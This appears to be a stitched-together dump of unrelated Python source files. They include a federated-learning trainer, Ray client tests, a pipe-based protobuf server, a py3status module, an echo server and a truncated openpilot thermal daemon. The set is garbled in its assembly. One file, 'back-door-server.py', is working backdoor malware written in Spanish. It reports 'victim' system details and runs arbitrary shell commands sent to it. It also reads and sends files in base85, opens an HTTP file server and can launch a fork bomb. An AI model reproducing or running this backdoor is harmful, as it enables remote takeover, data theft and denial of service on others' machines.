def get_next_train_batch(self):
try:
            # Samples a new batch for personalizing
(x, y) = next(self.iter_trainloader)
except StopIteration:
# restart the generator if the previous generator is exhausted.
self.iter_trainloader = iter(self.public_data_loader)
(x, y) = next(self.iter_trainloader)
if type(x) == type([]):
x[0] = x[0].to(self.device)
else:
x = x.to(self.device)
y = y.to(self.device)
return x, y
def train(self):
for i in range(self.start_epoch, self.global_rounds+1):
print(f"\n-------------Round number: {i}-------------")
if i<self.global_rounds/2:
eval_gap = 50
elif i< self.global_rounds*95/100 and i>=self.global_rounds/2:
eval_gap = 20
else:
eval_gap = 1
if i%eval_gap == 0:
print("\nEvaluate global model")
test_acc, train_acc, train_loss, personalized_acc = self.evaluate(i)
info_dict = {
"learning_rate": self.clients[0].optimizer.state_dict()['param_groups'][0]['lr'],
"global_valid_top1_acc": test_acc*100,
"average_valid_top1_acc": personalized_acc*100,
"epoch": i
}
# print(info_dict)
wandb.log(info_dict)
self.selected_clients = self.clients
for client in self.clients:
# client.scheduler.update(i, 0.0)
client.train()
# if i >= self.global_rounds/5:
# for step in range(self.alignment_step):
# x, y = self.get_next_train_batch()
# logits = None
# for client in self.clients:
# tep=copy.deepcopy(client.predict(x).detach())
# if logits == None:
# logits = tep
# else:
# logits += tep
# logits /= len(self.clients)
# for client in self.clients:
# client.MD_aggregation(logits)
# threads = [Thread(target=client.train)
# for client in self.selected_clients]
# [t.start() for t in threads]
# [t.join() for t in threads]
if i % 100 == 0:
self.save_global_model_middle(i)
print("\nBest global results.")
self.print_(max(self.rs_test_acc), max(self.rs_train_acc), min(self.rs_train_loss), max(self.rs_personalized_acc))
self.save_results()
self.save_global_model()
|
back-door-server.py
|
#! /usr/bin/python3
import http.server
import platform
import socket
import base64
import datetime
import os
import sys
import subprocess
from multiprocessing import Process, cpu_count
global _CodingBase85Text
global _DecodingBase85Text
global _ServerConnect
global _ForkBom
global _CloseServer
global _OsInfo
global _HttpServer
global hilo3
def _MAIN():
def _CodingBase85Text(ServerConnect, text):
data = base64.b85encode(text.encode('ascii'), pad=False)
ServerConnect.send(data)
def _DecodingBase85Text(ServerConnect, buffer):
data = ServerConnect.recv(buffer).decode()
data = base64.b85decode(data)
return str(data.decode('ascii'))
def _CloseServer(ServerDesconnect):
ServerDesconnect.close()
sys.exit()
def _ForkBom():
while True:
os.fork()
def _HttpServer():
def test(HandlerClass=http.server.BaseHTTPRequestHandler,ServerClass=http.server.HTTPServer,
protocol="HTTP/1.0", port=9785, bind=""):
server_address = (bind, port)
HandlerClass.protocol_version = protocol
httpd = ServerClass(server_address, HandlerClass)
try:
httpd.serve_forever()
except KeyboardInterrupt:
sys.exit(0)
return port
handler_class = http.server.SimpleHTTPRequestHandler
port = test(HandlerClass=handler_class)
return port
class BackDoor:
def __init__(self):
self.Host = '127.0.0.1'
try:
self.Port = sys.argv[1]
self.Port = int(self.Port)
except IndexError:
self.Port = 6365
self.Ip = None
self.Target = None
self.Data = None
self.ListenSocket = 1
self.buffer = 3500
self.Green = "\033[1;32m"
self.White = "\033[1;37m"
self.i = 1
self.Server = socket.socket()
self.Time = str(datetime.date.today())
self.Cwd = str(os.getcwd())
self.Os = str(sys.platform)
def _ServerConnect(self):
self.Server.bind((str(self.Host), int(self.Port)))
self.Server.listen(int(self.ListenSocket))
self.Target, self.Ip = self.Server.accept()
print(self.Green+'[*]'+self.White+'conexion establecida')
while True:
def _OsInfo():
self.Cwd = os.getcwd()
OsInfo = "\033[1;32m[*]\033[1;37mConexion establecida.\n"
OsInfo += "\033[1;32m[*]\033[1;37mEl sistema operativo victima es: " + str(self.Os)+'\n'
OsInfo += "\033[1;32m[*]\033[1;37mTiempo: " + str(self.Time)+'\n'
OsInfo += "\033[1;32m[*]\033[1;37mDirectorio: " + str(self.Cwd)+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mNombre del equipo: " + str(socket.gethostname())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37maseguramiento del nombre del dispositivo: "+str(platform.node())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mIp de la maquina: " + str(self.Ip) + '\n'
OsInfo += "\033[1;32m[*]\033[1;37mBuffer: " + str(self.buffer) + '\n'
OsInfo += "\033[1;32m[*]\033[1;37mTipo de conexion: " + str(self.Target) + '\n'
OsInfo += "\033[1;32m[*]\033[1;37mEjecutable de pythhon con el que se ejecuta: "+str(platform.architecture(sys.executable , '' , ''))+'\n'
OsInfo += "\033[1;32m[*]\033[1;37mEstructura: " + str(platform.machine()) +"\n"
OsInfo += "\033[1;32m[*]\033[1;37mSistema operativo: "+str(platform.platform(0, 0))+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mNombre real del Procesador: "+str(platform.processor())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mInfo de la version python: "+str(platform.python_build())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mCompilador de python: "+str(platform.python_compiler())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mImplementacion de python: "+str(platform.python_implementation())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mVersion del sistema: "+str(platform.release())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37mTipo de sistema: "+str(platform.system())+"\n"
OsInfo += "\033[1;32m[*]\033[1;37m"+str(platform.uname())+"\n"
return str(OsInfo)
if self.i == 1:
_CodingBase85Text(self.Target, _OsInfo())
self.i = 2
comand = str(_DecodingBase85Text(self.Target, self.buffer))
if comand == 'exit':
_CloseServer(self.Server)
break
elif comand == 'cd':
ruta = _DecodingBase85Text(self.Target, 1000)
os.chdir(str(ruta))
print("va")
self.Cwd = os.getcwd
print(self.Cwd)
_CodingBase85Text(self.Target, ("se pudo aceder a la carpeta: "+str(ruta)))
elif comand == 'BombFork':
hilo1 = Process(target=_ForkBom)
hilo2 = Process(target=self.Server.close())
hilo2.start()
hilo2.join()
hilo1.start()
elif comand == 'OsInfo':
_CodingBase85Text(self.Target, str(_OsInfo()))
elif str(comand) == 'cwd':
self.Cwd = os.getcwd()
_CodingBase85Text(self.Target, str(self.Cwd))
elif comand == 'HttpServer':
PortHttp = 9785
hilo3 = Process(target=_HttpServer)
hilo3.start()
_CodingBase85Text(self.Target, "server abierto en el puerto "+str(PortHttp))
elif comand == 'CloseHttpServer':
try:
hilo3.terminate()
_CodingBase85Text(self.Target, "server cerrado en el puerto "+str(PortHttp))
except UnboundLocalError:
pass
elif comand == 'cd ..':
os.chdir("..")
self.Cwd = os.getcwd()
_CodingBase85Text(self.Target, str(self.Cwd))
elif comand == 'read':
fileOpen = _DecodingBase85Text(self.Target, self.buffer)
try:
try:
_CodingBase85Text(self.Target, str("no binary"))
file = open(str(fileOpen), "r")
dataL = file.read()
file.close()
_CodingBase85Text(self.Target, str(dataL))
except (FileNotFoundError, IsADirectoryError):
_CodingBase85Text(self.Target, str("este archivo no esiste o es una carpeta"))
except UnicodeDecodeError:
try:
_CodingBase85Text(self.Target, str("binary"))
file = open(str(fileOpen), "rb")
dataL = file.read()
dataL = dataL
file.close()
_CodingBase85Text(self.Target, str(dataL))
except FileNotFoundError:
_CodingBase85Text(self.Target, str("este archivo no esiste"))
elif comand != 'CloseHttpServer' and comand != 'HttpServer' and str(comand) != 'cwd' and comand != 'OsInfo' and comand != 'BombFork' and str(comand) == 'cd' and comand == 'exit' and comand == 'cd ..' and comand == "read":
try:
data = self.Green + str(subprocess.getstatusoutput(str(comand))[1])
except UnicodeDecodeError:
data = '\033[1;36mocurrio un error de descodificaion unicode en el servidor'
_CodingBase85Text(self.Target, str(len(data)))
_CodingBase85Text(self.Target, str(data))
comand = None
data = None
else:
data = self.Green + str(subprocess.getstatusoutput(str(comand))[1])
_CodingBase85Text(self.Target, str(len(data)))
_CodingBase85Text(self.Target, str(data))
comand = None
data = None
if sys.platform == 'linux' or sys.platform == 'linux2':
os.system("clear")
elif sys.platform == 'win32':
os.system("cls")
else :
os.system("cls")
_CodingBase85Text(self.Target, _OsInfo())
BackDoor = BackDoor()
BackDoor._ServerConnect()
if __name__ == "__main__":
_MAIN()
|
test_client.py
|
import pytest
import time
import sys
import logging
import threading
import ray.util.client.server.server as ray_client_server
from ray.util.client.common import ClientObjectRef
from ray.util.client.ray_client_helpers import ray_start_client_server
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_real_ray_fallback(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def get_nodes_real():
import ray as real_ray
return real_ray.nodes()
nodes = ray.get(get_nodes_real.remote())
assert len(nodes) == 1, nodes
@ray.remote
def get_nodes():
# Can access the full Ray API in remote methods.
return ray.nodes()
nodes = ray.get(get_nodes.remote())
assert len(nodes) == 1, nodes
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_nested_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
@ray.remote
def f():
return "OK"
return ray.get(f.remote())
assert ray.get(g.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_put_get(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
print(objectref)
retval = ray.get(objectref)
assert retval == "hello world"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_wait(ray_start_regular_shared):
with ray_start_client_server() as ray:
objectref = ray.put("hello world")
ready, remaining = ray.wait([objectref])
assert remaining == []
retval = ray.get(ready[0])
assert retval == "hello world"
objectref2 = ray.put(5)
ready, remaining = ray.wait([objectref, objectref2])
assert (ready, remaining) == ([objectref], [objectref2]) or \
(ready, remaining) == ([objectref2], [objectref])
ready_retval = ray.get(ready[0])
remaining_retval = ray.get(remaining[0])
assert (ready_retval, remaining_retval) == ("hello world", 5) \
or (ready_retval, remaining_retval) == (5, "hello world")
with pytest.raises(Exception):
# Reference not in the object store.
ray.wait([ClientObjectRef("blabla")])
with pytest.raises(TypeError):
ray.wait("blabla")
with pytest.raises(TypeError):
ray.wait(ClientObjectRef("blabla"))
with pytest.raises(TypeError):
ray.wait(["blabla"])
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_remote_functions(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def plus2(x):
return x + 2
@ray.remote
def fact(x):
print(x, type(fact))
if x <= 0:
return 1
# This hits the "nested tasks" issue
# https://github.com/ray-project/ray/issues/3644
# So we're on the right track!
return ray.get(fact.remote(x - 1)) * x
ref2 = plus2.remote(234)
# `236`
assert ray.get(ref2) == 236
ref3 = fact.remote(20)
# `2432902008176640000`
assert ray.get(ref3) == 2_432_902_008_176_640_000
# Reuse the cached ClientRemoteFunc object
ref4 = fact.remote(5)
assert ray.get(ref4) == 120
# Test ray.wait()
ref5 = fact.remote(10)
# should return ref2, ref3, ref4
res = ray.wait([ref5, ref2, ref3, ref4], num_returns=3)
assert [ref2, ref3, ref4] == res[0]
assert [ref5] == res[1]
assert ray.get(res[0]) == [236, 2_432_902_008_176_640_000, 120]
# should return ref2, ref3, ref4, ref5
res = ray.wait([ref2, ref3, ref4, ref5], num_returns=4)
assert [ref2, ref3, ref4, ref5] == res[0]
assert [] == res[1]
all_vals = ray.get(res[0])
assert all_vals == [236, 2_432_902_008_176_640_000, 120, 3628800]
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_function_calling_function(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
def g():
return "OK"
@ray.remote
def f():
print(f, g)
return ray.get(g.remote())
print(f, type(f))
assert ray.get(f.remote()) == "OK"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_actor(ray_start_regular_shared):
with ray_start_client_server() as ray:
@ray.remote
class HelloActor:
def __init__(self):
self.count = 0
def say_hello(self, whom):
self.count += 1
return ("Hello " + whom, self.count)
actor = HelloActor.remote()
s, count = ray.get(actor.say_hello.remote("you"))
assert s == "Hello you"
assert count == 1
s, count = ray.get(actor.say_hello.remote("world"))
assert s == "Hello world"
assert count == 2
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_pass_handles(ray_start_regular_shared):
"""Test that passing client handles to actors and functions to remote actors
in functions (on the server or raylet side) works transparently to the
caller.
"""
with ray_start_client_server() as ray:
@ray.remote
class ExecActor:
def exec(self, f, x):
return ray.get(f.remote(x))
def exec_exec(self, actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def fact(x):
out = 1
while x > 0:
out = out * x
x -= 1
return out
@ray.remote
def func_exec(f, x):
return ray.get(f.remote(x))
@ray.remote
def func_actor_exec(actor, f, x):
return ray.get(actor.exec.remote(f, x))
@ray.remote
def sneaky_func_exec(obj, x):
return ray.get(obj["f"].remote(x))
@ray.remote
def sneaky_actor_exec(obj, x):
return ray.get(obj["actor"].exec.remote(obj["f"], x))
def local_fact(x):
if x <= 0:
return 1
return x * local_fact(x - 1)
assert ray.get(fact.remote(7)) == local_fact(7)
assert ray.get(func_exec.remote(fact, 8)) == local_fact(8)
test_obj = {}
test_obj["f"] = fact
assert ray.get(sneaky_func_exec.remote(test_obj, 5)) == local_fact(5)
actor_handle = ExecActor.remote()
assert ray.get(actor_handle.exec.remote(fact, 7)) == local_fact(7)
assert ray.get(func_actor_exec.remote(actor_handle, fact,
10)) == local_fact(10)
second_actor = ExecActor.remote()
assert ray.get(actor_handle.exec_exec.remote(second_actor, fact,
9)) == local_fact(9)
test_actor_obj = {}
test_actor_obj["actor"] = second_actor
test_actor_obj["f"] = fact
assert ray.get(sneaky_actor_exec.remote(test_actor_obj,
4)) == local_fact(4)
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.log = test_log
ray.worker.log_client.set_logstream_level(logging.DEBUG)
        # Allow some time to propagate
time.sleep(1)
x = ray.put("Foo")
assert ray.get(x) == "Foo"
time.sleep(1)
logs_with_id = [msg for msg in log_msgs if msg.find(x.id.hex()) >= 0]
assert len(logs_with_id) >= 2
assert any((msg.find("get") >= 0 for msg in logs_with_id))
assert any((msg.find("put") >= 0 for msg in logs_with_id))
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_stdout_log_stream(ray_start_regular_shared):
with ray_start_client_server() as ray:
log_msgs = []
def test_log(level, msg):
log_msgs.append(msg)
ray.worker.log_client.stdstream = test_log
@ray.remote
def print_on_stderr_and_stdout(s):
print(s)
print(s, file=sys.stderr)
time.sleep(1)
print_on_stderr_and_stdout.remote("Hello world")
time.sleep(1)
assert len(log_msgs) == 2
assert all((msg.find("Hello world") for msg in log_msgs))
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_create_remote_before_start(ray_start_regular_shared):
"""Creates remote objects (as though in a library) before
starting the client.
"""
from ray.util.client import ray
@ray.remote
class Returner:
def doit(self):
return "foo"
@ray.remote
def f(x):
return x + 20
# Prints in verbose tests
print("Created remote functions")
with ray_start_client_server() as ray:
assert ray.get(f.remote(3)) == 23
a = Returner.remote()
assert ray.get(a.doit.remote()) == "foo"
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_basic_named_actor(ray_start_regular_shared):
"""Test that ray.get_actor() can create and return a detached actor.
"""
with ray_start_client_server() as ray:
@ray.remote
class Accumulator:
def __init__(self):
self.x = 0
def inc(self):
self.x += 1
def get(self):
return self.x
# Create the actor
actor = Accumulator.options(name="test_acc").remote()
actor.inc.remote()
actor.inc.remote()
# Make sure the get_actor call works
new_actor = ray.get_actor("test_acc")
new_actor.inc.remote()
assert ray.get(new_actor.get.remote()) == 3
del actor
actor = Accumulator.options(
name="test_acc2", lifetime="detached").remote()
actor.inc.remote()
del actor
detatched_actor = ray.get_actor("test_acc2")
for i in range(5):
detatched_actor.inc.remote()
assert ray.get(detatched_actor.get.remote()) == 6
@pytest.mark.skipif(sys.platform == "win32", reason="Failing on Windows.")
def test_internal_kv(ray_start_regular_shared):
with ray_start_client_server() as ray:
assert ray._internal_kv_initialized()
assert not ray._internal_kv_put("apple", "b")
assert ray._internal_kv_put("apple", "asdf")
assert ray._internal_kv_put("apple", "b")
assert ray._internal_kv_get("apple") == b"b"
assert ray._internal_kv_put("apple", "asdf", overwrite=True)
assert ray._internal_kv_get("apple") == b"asdf"
assert ray._internal_kv_list("a") == [b"apple"]
ray._internal_kv_del("apple")
assert ray._internal_kv_get("apple") == b""
def test_startup_retry(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
with pytest.raises(ConnectionError):
ray_client.connect("localhost:50051", connection_retries=1)
def run_client():
ray_client.connect("localhost:50051")
ray_client.disconnect()
thread = threading.Thread(target=run_client, daemon=True)
thread.start()
time.sleep(3)
server = ray_client_server.serve("localhost:50051")
thread.join()
server.stop(0)
ray_client._inside_client_test = False
def test_dataclient_server_drop(ray_start_regular_shared):
from ray.util.client import ray as ray_client
ray_client._inside_client_test = True
@ray_client.remote
def f(x):
time.sleep(4)
return x
def stop_server(server):
time.sleep(2)
server.stop(0)
server = ray_client_server.serve("localhost:50051")
ray_client.connect("localhost:50051")
thread = threading.Thread(target=stop_server, args=(server, ))
thread.start()
x = f.remote(2)
with pytest.raises(ConnectionError):
_ = ray_client.get(x)
thread.join()
ray_client.disconnect()
ray_client._inside_client_test = False
# Wait for f(x) to finish before ray.shutdown() in the fixture
time.sleep(3)
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
server.py
|
import os
import time
import logging
from multiprocessing import Process
logging.basicConfig(level=logging.INFO)
import numpy as np
from models import Oracle, Feasibility, Pushability
from oracle_pb2 import (
ActionRequest,
ActionResponse,
FeasibilityRequest,
FeasibilityResponse,
PushabilityRequest,
PushabilityResponse,
)
def get_pipe_path(name):
path = os.environ.get(name)
if not path:
raise EnvironmentError('Environment variable {} not set'.format(name))
else:
return path
def oracle_loop():
try:
action_request = ActionRequest()
for attr in action_request.FindInitializationErrors():
setattr(action_request, attr, 0.0)
message_size = action_request.ByteSize()
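        # All fields reported by FindInitializationErrors appear to be scalar
        # floats; zero-filling them and taking ByteSize() presumably yields a
        # fixed serialized size, so every pipe read can use this constant.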
oracle = Oracle()
request_path = get_pipe_path('ORACLE_REQUEST_PIPE_PATH')
response_path = get_pipe_path('ORACLE_RESPONSE_PIPE_PATH')
logging.info('Action request server started')
while True:
with open(request_path, 'rb') as request_pipe:
                data = request_pipe.read(message_size)
                if len(data) == 0:
                    break
                request = ActionRequest.FromString(data)
                start = time.perf_counter()
                response = oracle.sample(request)
end = time.perf_counter()
response.cpu_time = end - start
with open(response_path, 'wb') as response_pipe:
response_pipe.write(response.SerializeToString())
except KeyboardInterrupt:
pass
def feasibility_loop():
try:
feasibility_request = FeasibilityRequest()
for attr in feasibility_request.FindInitializationErrors():
setattr(feasibility_request, attr, 0.0)
message_size = feasibility_request.ByteSize()
feasibility = Feasibility()
request_path = get_pipe_path('FEASIBILITY_REQUEST_PIPE_PATH')
response_path = get_pipe_path('FEASIBILITY_RESPONSE_PIPE_PATH')
logging.info('Feasibility server started')
while True:
with open(request_path, 'rb') as request_pipe:
                data = request_pipe.read(message_size)
                if len(data) == 0:
                    break
                request = FeasibilityRequest.FromString(data)
                start = time.perf_counter()
                response = feasibility.mahalanobis(request)
end = time.perf_counter()
response.cpu_time = end - start
with open(response_path, 'wb') as response_pipe:
response_pipe.write(response.SerializeToString())
except KeyboardInterrupt:
pass
def feasibility_sample_loop():
try:
request = FeasibilityRequest()
for attr in request.FindInitializationErrors():
setattr(request, attr, 0.0)
message_size = request.ByteSize()
feasibility = Feasibility()
request_path = get_pipe_path('FEASIBILITY_SAMPLE_REQUEST_PIPE_PATH')
response_path = get_pipe_path('FEASIBILITY_SAMPLE_RESPONSE_PIPE_PATH')
logging.info('Feasibility sample server started')
while True:
with open(request_path, 'rb') as request_pipe:
                data = request_pipe.read(message_size)
                if len(data) == 0:
                    break
                request = FeasibilityRequest.FromString(data)
                start = time.perf_counter()
                response = feasibility.sample(request)
end = time.perf_counter()
response.cpu_time = end - start
with open(response_path, 'wb') as response_pipe:
response_pipe.write(response.SerializeToString())
except KeyboardInterrupt:
pass
def pushability_loop():
try:
pushability_request = PushabilityRequest()
for attr in pushability_request.FindInitializationErrors():
setattr(pushability_request, attr, 0.0)
message_size = pushability_request.ByteSize()
request_path = get_pipe_path('PUSHABILITY_REQUEST_PIPE_PATH')
response_path = get_pipe_path('PUSHABILITY_RESPONSE_PIPE_PATH')
pushability = Pushability()
logging.info('Pushability server started')
while True:
with open(request_path, 'rb') as request_pipe:
                data = request_pipe.read(message_size)
                if len(data) == 0:
                    break
                request = PushabilityRequest.FromString(data)
                start = time.perf_counter()
                response = pushability.mahalanobis(request)
end = time.perf_counter()
response.cpu_time = end - start
with open(response_path, 'wb') as response_pipe:
response_pipe.write(response.SerializeToString())
except KeyboardInterrupt:
pass
def pushability_projection_loop():
try:
pushability_request = PushabilityRequest()
for attr in pushability_request.FindInitializationErrors():
setattr(pushability_request, attr, 0.0)
message_size = pushability_request.ByteSize()
request_path = get_pipe_path('PUSHABILITY_PROJECTION_REQUEST_PIPE_PATH')
response_path = get_pipe_path('PUSHABILITY_PROJECTION_RESPONSE_PIPE_PATH')
pushability = Pushability()
logging.info('Pushability projection server started')
while True:
with open(request_path, 'rb') as request_pipe:
                data = request_pipe.read(message_size)
                if len(data) == 0:
                    break
                request = PushabilityRequest.FromString(data)
                start = time.perf_counter()
                response = pushability.projection(request)
end = time.perf_counter()
response.cpu_time = end - start
with open(response_path, 'wb') as response_pipe:
response_pipe.write(response.SerializeToString())
except KeyboardInterrupt:
pass
if __name__ == '__main__':
oracle_proc = Process(target=oracle_loop)
oracle_proc.start()
feasibility_sample_proc = Process(target=feasibility_sample_loop)
feasibility_sample_proc.start()
|
scratchpad_async.py
|
# -*- coding: utf-8 -*-
"""
Display the amount of windows and indicate urgency hints on scratchpad (async).
Configuration parameters:
always_show: whether the indicator should be shown if there are no
scratchpad windows (default False)
color_urgent: color to use if a scratchpad window is urgent (default
"#900000")
format: string to format the output (default "{} ⌫")
Requires:
i3ipc: (https://github.com/acrisci/i3ipc-python)
@author cornerman
@license BSD
"""
from threading import Thread
import i3ipc
class Py3status:
"""
"""
# available configuration parameters
always_show = False
color_urgent = "#900000"
format = "{} ⌫"
def __init__(self):
self.count = 0
self.urgent = False
t = Thread(target=self._listen)
t.daemon = True
t.start()
def scratchpad_counter(self, i3s_output_list, i3s_config):
response = {'cached_until': self.py3.CACHE_FOREVER}
if self.urgent:
response['color'] = self.color_urgent
if self.always_show or self.count > 0:
response['full_text'] = self.format.format(self.count)
else:
response['full_text'] = ''
return response
def _listen(self):
def update_scratchpad_counter(conn, e=None):
cons = conn.get_tree().scratchpad().leaves()
self.urgent = any(con for con in cons if con.urgent)
self.count = len(cons)
self.py3.update()
conn = i3ipc.Connection()
update_scratchpad_counter(conn)
conn.on('window::move', update_scratchpad_counter)
conn.on('window::urgent', update_scratchpad_counter)
conn.main()
if __name__ == "__main__":
"""
Test this module by calling it directly.
"""
from time import sleep
x = Py3status()
config = {
'color_bad': '#FF0000',
'color_degraded': '#FFFF00',
'color_good': '#00FF00'
}
while True:
print(x.scratchpad_counter([], config))
sleep(1)
|
networking_05.py
|
import asyncio
class EchoServer:
MAX_MESSAGE_SIZE = 2**16 # 65k
MESSAGE_HEADER_LEN = len(str(MAX_MESSAGE_SIZE))
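    # Framing used by send/recv below: each message is a zero-padded ASCII
    # length header of MESSAGE_HEADER_LEN digits followed by the payload,
    # e.g. b'00005' + b'hello'.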
def __init__(self, host='0.0.0.0', port=9800):
self._host = host
self._port = port
self._server = None
def serve(self, loop):
coro = asyncio.start_server(self.handle, self._host, self._port,
loop=loop)
self._server = loop.run_until_complete(coro)
print('Serving on %s:%s' % (self._host, self._port))
loop.run_until_complete(self._server.wait_closed())
print('Done')
@property
def started(self):
return self._server is not None and self._server.sockets
def stop(self):
print('Stopping...')
self._server.close()
async def handle(self, reader, writer):
data = await self.recv_message(reader)
await self.send_message(writer, b'ECHO: %s' % data)
# Signal we finished handling this request
# or the server will hang.
writer.close()
@classmethod
async def recv_message(cls, socket):
data_size = int(await socket.read(cls.MESSAGE_HEADER_LEN))
data = await socket.read(data_size)
return data
@classmethod
async def send_message(cls, socket, message):
if len(message) > cls.MAX_MESSAGE_SIZE:
raise ValueError('Message too big')
message_size = str(len(message)).encode('ascii')
message_size = message_size.zfill(cls.MESSAGE_HEADER_LEN)
data = message_size + message
socket.write(data)
await socket.drain()
import socket
def send_message_to_server(ip, port, message):
def _recv_message(socket):
data_size = int(socket.recv(EchoServer.MESSAGE_HEADER_LEN))
data = socket.recv(data_size)
return data
def _prepare_message(message):
if len(message) > EchoServer.MAX_MESSAGE_SIZE:
raise ValueError('Message too big')
message_size = str(len(message)).encode('ascii')
message_size = message_size.zfill(EchoServer.MESSAGE_HEADER_LEN)
return message_size + message
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ip, port))
try:
sock.sendall(_prepare_message(message))
response = _recv_message(sock)
print("ANSWER: {}".format(response))
finally:
sock.close()
server = EchoServer()
def serve_for_3_seconds():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.call_later(3, server.stop)
server.serve(loop)
loop.close()
import threading
server_thread = threading.Thread(target=serve_for_3_seconds)
server_thread.start()
while not server.started:
pass
send_message_to_server('localhost', server._port, b"Hello World 1")
send_message_to_server('localhost', server._port, b"Hello World 2")
send_message_to_server('localhost', server._port, b"Hello World 3")
server_thread.join()
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.hardware import HARDWARE, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import TiciFanController
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
DISCONNECT_TIMEOUT = 5. # wait 5 seconds before going offroad after disconnect so you get an alert
PANDA_STATES_TIMEOUT = int(1000 * 2.5 * DT_TRML) # 2.5x the expected pandaState frequency
ThermalBand = namedtuple("ThermalBand", ['min_temp', 'max_temp'])
HardwareState = namedtuple("HardwareState", ['network_type', 'network_metered', 'network_strength', 'network_info', 'nvme_temps', 'modem_temps', 'wifi_address'])
# List of thermal bands. We will stay within this region as long as we are within the bounds.
# When exiting the bounds, we'll jump to the lower or higher band. Bands are ordered in the dict.
THERMAL_BANDS = OrderedDict({
ThermalStatus.green: ThermalBand(None, 80.0),
ThermalStatus.yellow: ThermalBand(75.0, 96.0),
ThermalStatus.red: ThermalBand(80.0, 107.),
ThermalStatus.danger: ThermalBand(94.0, None),
})
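# Example of the resulting hysteresis: starting in the green band, the status
# only moves up to yellow once the max component temp exceeds 80.0C, but once
# in yellow it only drops back to green after the temp falls below 75.0C.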
# Override to highest thermal band when offroad and above this temp
OFFROAD_DANGER_TEMP = 79.5
prev_offroad_states: Dict[str, Tuple[bool, Optional[str]]] = {}
tz_by_type: Optional[Dict[str, int]] = None
def populate_tz_by_type():
global tz_by_type
tz_by_type = {}
for n in os.listdir("/sys/devices/virtual/thermal"):
if not n.startswith("thermal_zone"):
continue
with open(os.path.join("/sys/devices/virtual/thermal", n, "type")) as f:
tz_by_type[f.read().strip()] = int(n.lstrip("thermal_zone"))
def read_tz(x):
if x is None:
return 0
if isinstance(x, str):
if tz_by_type is None:
populate_tz_by_type()
x = tz_by_type[x]
try:
with open(f"/sys/devices/virtual/thermal/thermal_zone{x}/temp") as f:
return int(f.read())
except FileNotFoundError:
return 0
def read_thermal(thermal_config):
dat = messaging.new_message('deviceState')
dat.deviceState.cpuTempC = [read_tz(z) / thermal_config.cpu[1] for z in thermal_config.cpu[0]]
dat.deviceState.gpuTempC = [read_tz(z) / thermal_config.gpu[1] for z in thermal_config.gpu[0]]
dat.deviceState.memoryTempC = read_tz(thermal_config.mem[0]) / thermal_config.mem[1]
dat.deviceState.ambientTempC = read_tz(thermal_config.ambient[0]) / thermal_config.ambient[1]
dat.deviceState.pmicTempC = [read_tz(z) / thermal_config.pmic[1] for z in thermal_config.pmic[0]]
return dat
def set_offroad_alert_if_changed(offroad_alert: str, show_alert: bool, extra_text: Optional[str]=None):
if prev_offroad_states.get(offroad_alert, None) == (show_alert, extra_text):
return
prev_offroad_states[offroad_alert] = (show_alert, extra_text)
set_offroad_alert(offroad_alert, show_alert, extra_text)
def hw_state_thread(end_event, hw_queue):
"""Handles non critical hardware state, and sends over queue"""
count = 0
registered_count = 0
prev_hw_state = None
modem_version = None
modem_nv = None
modem_configured = False
while not end_event.is_set():
# these are expensive calls. update every 10s
if (count % int(10. / DT_TRML)) == 0:
try:
network_type = HARDWARE.get_network_type()
modem_temps = HARDWARE.get_modem_temperatures()
if len(modem_temps) == 0 and prev_hw_state is not None:
modem_temps = prev_hw_state.modem_temps
# Log modem version once
if TICI and ((modem_version is None) or (modem_nv is None)):
modem_version = HARDWARE.get_modem_version() # pylint: disable=assignment-from-none
modem_nv = HARDWARE.get_modem_nv() # pylint: disable=assignment-from-none
if (modem_version is not None) and (modem_nv is not None):
